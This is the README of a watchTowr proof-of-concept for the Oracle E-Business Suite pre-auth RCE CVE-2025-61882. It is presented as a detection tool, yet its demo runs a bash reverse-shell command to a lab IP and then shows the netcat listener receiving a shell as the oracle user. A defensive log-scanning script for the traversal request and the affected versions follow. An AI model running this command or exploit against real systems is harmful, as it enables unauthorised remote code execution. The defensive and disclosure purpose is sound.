# watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882
<img width="1000" height="627" alt="image" src="https://github.com/user-attachments/assets/46794126-0c0a-4cb6-b601-d7cc9a09f3ff" />
Detection Artifact Generator for Oracle E-Business Suite CVE-2025-61882
See our [blog post](https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/) for technical details.
# Detection in Action
```
python3 watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882.py --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' --platform linux --target http://192.168.1.22:8000 --lhost 192.168.1.10 --lport 80
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882.py
(*) Oracle E-Business Suite Pre-Auth RCE Detection Artifact Generator
- Sonny, Sina Kheirkhah (@SinSinology), Jake Knott (@inkmoro) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2025-61882]
[*] Listening on 192.168.1.10:80 and serving payload...
[*] connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking smuggle stub...
192.168.1.22 - - [06/Oct/2025 20:49:59] "GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1" 200 -
```
Listener
```
ubuntu@watchTowr:~$ nc -lvvnp 4444
Listening on 0.0.0.0 4444
Connection received on 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba),54323(oper),54324(backupdba),54325(dgdba),54326(kmdba),54330(racdba)
[oracle@apps EBS_domain]$
```
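For defenders, the one request visible in the tool output above (`GET /OA_HTML/help/../ieshostedsurvey.xsl`) can be searched for in web or proxy access logs. The following is an added example, not part of the watchTowr script: the log format, the function names and every sample line except the first are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Matches Common Log Format and the Python http.server format seen in the README.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})\b'
)
XSL_NAME = "ieshostedsurvey.xsl"  # file name taken from the README output
EBS_PREFIX = "/oa_html/"          # path prefix taken from the README output


def classify(line):
    """Return (src, ts, raw_path, reasons) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m["path"]
    for _ in range(3):  # decode repeatedly so %2e%2e and %252e%252e become ".."
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path_only = path.split("?", 1)[0].replace("\\", "/").lower()
    segments = path_only.split("/")
    reasons = []
    if path_only.startswith(EBS_PREFIX) and ".." in segments:
        reasons.append("dot-dot segment under /OA_HTML/")
    if segments[-1] == XSL_NAME:
        reasons.append("request for " + XSL_NAME)
    return (m["src"], m["ts"], m["path"], reasons) if reasons else None


def scan(lines):
    """Return the findings for every suspicious line in an iterable of log lines."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample log: only the first line comes from the README output.
SAMPLE = [
    '192.168.1.22 - - [06/Oct/2025 20:49:59] "GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1" 200 -',
    '10.0.0.5 - - [06/Oct/2025:20:50:01 +0000] "GET /OA_HTML/help/%2e%2e/ieshostedsurvey.xsl HTTP/1.1" 200 512',
    '10.0.0.7 - - [06/Oct/2025:20:51:10 +0000] "GET /OA_HTML/example_page.jsp HTTP/1.1" 200 4096',
    '10.0.0.9 - - [06/Oct/2025:20:52:30 +0000] "POST /OA_HTML/help/example_topic.jsp HTTP/1.1" 302 -',
]

if __name__ == "__main__":
    for src, ts, path, reasons in scan(SAMPLE):
        print(f"{ts} {src} {path} -> {'; '.join(reasons)}")
```

A hit is a lead to investigate alongside the affected-version check and Oracle's advisory, not proof of compromise.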
# Description
This script attempts to detect whether an Oracle E-Business Suite instance is vulnerable to CVE-2025-61882.
# Affected Versions
Oracle E-Business Suite, versions 12.2.3-12.2.14
For more information, visit [Oracle Security Alert Advisory - CVE-2025-61882](https://www.oracle.com/security-alerts/alert-cve-2025-61882.html).
# Follow [watchTowr](https://watchTowr.com) Labs
For the latest security research, follow the [watchTowr](https://watchTowr.com) Labs Team:
- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber
File snapshot
[4.0K] /data/pocs/b49e209b082868cf50d1559c22ce55bf6ad4ec56
├── [2.5K] README.md
└── [5.5K] watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882.py
0 directories, 2 files